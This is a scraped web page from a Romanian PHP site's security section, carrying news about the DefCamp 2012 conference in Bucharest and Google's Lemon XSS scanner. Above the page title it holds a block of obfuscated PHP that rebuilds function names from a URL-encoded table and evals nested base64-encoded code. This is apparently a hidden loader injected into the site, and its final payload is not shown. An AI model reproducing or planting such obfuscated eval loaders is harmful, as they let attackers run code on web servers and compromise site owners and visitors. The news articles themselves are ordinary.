$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iVnNCVEFFYml1aFN4S05sT3dYREpmZ0lucVJ2ZXpqWkZrcldVdHlNUENZR0xRb2NhcG1kSEFreVVNcUZWSXNUbHRoYWVnY1lLcmltQkNKTHZuWmp4UldmUHBHWHViZEVRem9TSHdORE91WTlnSE9NaVl6bz0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Securitate – PHPRomania

Securitate

DefCamp – conferința de hacking & INFOSEC din România

După mai mult de un an de la lansare si două evenimente pline de energie, idei, competiție, schimburi de experiență și distracție, DefCamp se mută în capitală în perioada 30 noiembrie – 2 decembrie la Hotelul Yesterday și promite o conferință de trei zile desfașurată în cele mai bune condiții pentru ca orice participant să poate interacționa cu numeroase persoane cu experiență vastă în domeniul INFOSEC.
DefCamp 2012 @Bucuresti este una dintre cele mai importante inițiative din domeniul INFOSEC & hacking din România de până acum, fiind așteptate în capitală aproape 250 de persoane.

“Pe parcursul celor trei zile, participanții vor putea urmări numeroase prezentări susținute de oameni cu experiență în domeniul INFOSEC, vor putea monitoriza Wall of Sheep, ar putea participa la concursul DCTF (DefCamp Capture the Flag) sau își vor putea pune site-ul la dispoziția unei echipe de testare. Totul sub același acoperiș, la același eveniment – DefCamp. E grozav!”, a declarat Andrei Avădănei, coordonatorul evenimentului.

Evenimentul din această toamnă atinge în cele peste 15 prezentări subiecte precum 0days, captcha breaking, digipass bypass, mobile security problems, DDOS, networking, P2P networks, D&D APT’s, social engineering și lista continuă, prezentările fiind susținute atât de specialiști din România cat și din străinătate.

Competiția DCTF (DefCamp Capture the Flag) va avea o etapă de pre-calificări online urmată de un duel în timpul evenimentului între echipele finaliste. Temele competiției sunt extrem de variate și provocatoare – exploits, cryptography, programming, steganography, forensics, reverse engineering, aceste subiecte fiind atinse în 30 de probleme din etapa de calificare.

Una dintre dintre noutățile cu care vine DefCamp 2012 @Bucuresti este DHME (DefCamp Hack ME). Orice participant își poate înscrie website-ul, aplicația sau proiectul iar echipa DHME se va ocupa pe perioada evenimentului de analiza și realizarea unui audit de securitate asupra lui. La finalul evenimentului cei înscriși vor primi pe email câte un raport cu privire la analiza făcută.

Lista cu noutățile de anul acesta este mult mai lungă dar mai multe detalii puteți descoperi accesând site-ul evenimentului sau aplicând la ediția din București. Vă așteptăm!

Read more...

Google descopera vulnerabilitatile cross-site scripting

Google lucrează la o aplicaţie cu numele Lemon, o combinaţie între un instrument de scanare şi un utilitar automat special conceput pentru a trata problemele de cross-side scripting (XSS).
Cei de la Google susţin că utilitarul va descoperi atât cross-site scripting-ul stocat (Srored XSS), cât şi pe cel reflectat (Reflected XSS), cele 2 forme uzuale ale atacului.
Deocamdată, Lemon este în dezvoltare şi testare internă în cadrul Google şi este particularizat pentru Google Apps.
Vor să adauge şi teste pentru SQL injecţion.

Pentru mai multe detalii vedeti http://www.googleonlinesecurity.blogspot.com/

Stire preluata de la chip.ro

Read more...